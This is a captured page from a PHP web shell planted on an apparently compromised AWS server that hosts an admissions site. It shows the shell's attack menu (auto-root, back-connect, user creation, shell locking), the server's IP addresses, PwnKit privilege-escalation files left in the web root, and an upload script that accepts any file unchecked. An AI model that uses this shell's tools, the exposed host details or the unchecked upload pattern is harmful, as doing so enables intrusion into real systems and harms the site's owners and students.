Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.12.163.120
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
phdadm /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwxrwx
.pkexec
[ DIR ]
drwxr-xr-x
.vscode
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
PHPExcel
[ DIR ]
drwxrwxrwx
Paytm
[ DIR ]
drwxrwxrwx
acu
[ DIR ]
drwxrwxr-x
acu-admin
[ DIR ]
drwxrwxr-x
admin-src
[ DIR ]
drwxrwxrwx
bcu
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
docs
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
libs
[ DIR ]
drwxrwxrwx
pgadm
[ DIR ]
drwxrwxrwx
pget_photos
[ DIR ]
drwxrwxrwx
pgetadm
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
razorpay
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
tcpdf
[ DIR ]
drwxrwxrwx
uniclare
[ DIR ]
drwxrwxr-x
upload
[ DIR ]
drwxrwxrwx
uploads
[ DIR ]
drwxrwxrwx
vku-admin
[ DIR ]
drwxrwxrwx
vskub
[ DIR ]
drwxrwxrwx
.DS_Store
22
KB
-rwxrwxrwx
.gitignore
67
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
.phdadm.php
3.61
KB
-rw-r--r--
AVAIL_SEATS_16112021.pdf
353.8
KB
-rwxrwxrwx
app.php
498
B
-rwxrwxrwx
casteupload.php
1.19
KB
-rw-r--r--
cconfig.php
1.84
KB
-rwxrwxrwx
consts.php
212
B
-rwxrwxrwx
database.php
643
B
-rwxrwxrwx
degreedocupload.php
1.19
KB
-rw-r--r--
forgot-password.php
2.19
KB
-rwxrwxrwx
hkupload.php
1.18
KB
-rw-r--r--
instruction_regn.html
4.44
KB
-rwxrwxrwx
login.php
317
B
-rwxrwxrwx
logo.jpg
85.69
KB
-rwxr-xr-x
nocupload.php
1.18
KB
-rw-r--r--
otherdocupload.php
1.19
KB
-rw-r--r--
pgResponse.php
12.83
KB
-rwxrwxrwx
photoupload.php
1.26
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
resetpassword.php
697
B
-rwxrwxrwx
rzp.csv
67
B
-rwxrwxrwx
sendGridMail.php
1.28
KB
-rwxrwxrwx
sendMobEmailOTP.php
3.55
KB
-rwxrwxrwx
sendsmsapi.php
814
B
-rwxrwxrwx
signin.php
973
B
-rwxrwxrwx
signup.php
1.22
KB
-rwxrwxrwx
some_excel_file.xlsx
6.6
KB
-rwxrwxrwx
student.php
13.52
KB
-rwxrwxrwx
teachdocupload.php
1.19
KB
-rw-r--r--
test.php
16
B
-rwxrwxrwx
ugcdocupload.php
1.15
KB
-rw-r--r--
upload.php
415
B
-rwxrwxrwx
upload1.php
423
B
-rwxrwxrwx
upload_file.php
787
B
-rwxrwxrwx
upload_file_org.php
787
B
-rwxrwxrwx
upload_file_pg.php
740
B
-rwxrwxrwx
validateRegno.php
2.1
KB
-rwxrwxrwx
validateRegno_04092020.php
2.03
KB
-rwxrwxrwx
verify.php
12.85
KB
-rwxrwxrwx
vkurankupd.php
1.27
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : otherdocupload.php
<?php //require_once("/Library/WebServer/Documents/oasis/aws/aws-autoloader.php"); require_once("/var/www/html/aws/aws-autoloader.php"); // require_once("C:/XAMPP/htdocs/aws/aws-autoloader.php"); use Aws\S3\S3Client; use Aws\S3\Exception\S3Exception; if ( 0 < $_FILES['file']['error'] ) { echo 'Error: ' . $_FILES['file']['error'] . '<br>'; } else { $x = $_FILES['file']; // var_dump($_FILES['file']); $f_file=explode(".",$x["name"]); $new_filename=$f_file[0].".".$f_file[1]; // var_dump($new_filename); // die(); move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/'. $_FILES['file']['name']); } if($new_filename){ $arr['err_code'] = 0; $arr['status'] = 'success'; $arr['otheruploadedfile']= $new_filename; $arr['msg'] = 'Updated Successfully...!'; echo json_encode($arr); return; }else { $arr['err_code'] = -1; $arr['status'] = 'Failure'; $arr['msg'] = 'Failed To update'; echo json_encode($arr); return; } ?>
Close